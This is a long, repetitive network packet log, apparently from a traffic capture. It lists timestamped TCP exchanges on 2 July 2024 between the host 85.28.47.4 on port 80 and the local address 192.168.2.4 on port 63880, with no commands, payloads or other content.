                                            Jul 2, 2024 08:26:29.646652937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646667004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646677017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646703005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646717072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646799088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646811008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646821022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646832943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646845102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646852016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646857023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646857977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646871090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646874905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646883965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646897078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646898031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646908998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.646938086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646938086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.646938086 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647567034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647578955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647588968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647599936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647609949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647620916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647620916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647633076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647644043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647644997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647655964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647660971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647666931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647686005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647687912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647696018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647706985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647707939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647718906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.647730112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647748947 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.647769928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648344040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648355007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648375034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648386955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648395061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648397923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648406029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648408890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648420095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648427010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648431063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648442984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648447037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648454905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648464918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648467064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648478031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648488045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648494005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648504972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648513079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648515940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648526907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648534060 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648538113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648547888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648551941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648561001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.648576021 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.648600101 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649243116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649259090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649270058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649281025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649292946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649297953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649303913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649313927 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649315119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649327040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649333000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649338961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649350882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649362087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649375916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649399042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649802923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649816036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649827003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649837971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649848938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649854898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649861097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649872065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649879932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649883032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649900913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649900913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649913073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649924040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649931908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649938107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649944067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649950981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649961948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649966955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649972916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649983883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.649983883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.649995089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650012970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650032997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650773048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650788069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650799036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650810003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650820971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650821924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650831938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650842905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650846958 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650855064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650866985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650871992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650877953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650891066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650895119 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650902033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650902987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650913954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650924921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650928974 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650937080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650949955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650952101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.650971889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.650985003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.651400089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.651451111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.734847069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734867096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734886885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734899044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734910011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734927893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734939098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734950066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734960079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734971046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734972954 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.734983921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.734991074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735027075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735079050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735091925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735129118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735207081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735217094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735228062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735238075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735248089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735249043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735270023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735290051 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735447884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735457897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735467911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735479116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735490084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735492945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735501051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735512018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735517979 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735539913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735553026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735780954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735793114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735832930 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735846043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735938072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735948086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735964060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735975027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735980034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.735985994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.735995054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736001015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736008883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736020088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736025095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736032963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736043930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736052990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736054897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736067057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736092091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736501932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736512899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736522913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736532927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736543894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736546993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736569881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736579895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736763954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736774921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736784935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736797094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736807108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736813068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736818075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736829042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736834049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736841917 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.736852884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736865997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.736890078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737297058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737308979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737318993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737329960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737340927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737345934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737351894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737361908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737370014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737374067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737384081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737389088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737397909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737406969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737410069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737420082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737423897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737431049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737441063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737447977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737452030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737462997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737471104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737473965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:29.737488985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.737512112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.885649920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:29.890650034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.062459946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.062514067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.062525988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.062611103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.062645912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063076973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063118935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063124895 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063132048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063152075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063172102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063409090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063421965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063433886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063445091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063446045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063462973 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063493013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063493967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063528061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063647032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063658953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063668966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063678980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063679934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063689947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063698053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063700914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063710928 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063723087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063730955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063739061 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063746929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063749075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.063769102 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.063791037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064097881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064110041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064121008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064131021 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064131021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064143896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064143896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064165115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064188004 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064364910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064383030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064393997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064403057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064404964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064415932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064425945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064429045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064439058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064450026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064455986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064465046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064467907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064475060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064487934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064515114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064903021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064913988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064925909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064938068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.064949989 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.064965010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065015078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065026045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065036058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065046072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065066099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065092087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065167904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065180063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065191031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065198898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065201998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065212011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065222979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065226078 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065233946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065244913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065248966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065259933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065269947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065270901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065280914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065288067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065291882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065301895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.065303087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065326929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.065352917 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.066095114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.066118956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.066129923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.066140890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.066142082 CEST806388085.28.47.4192.168.2.4
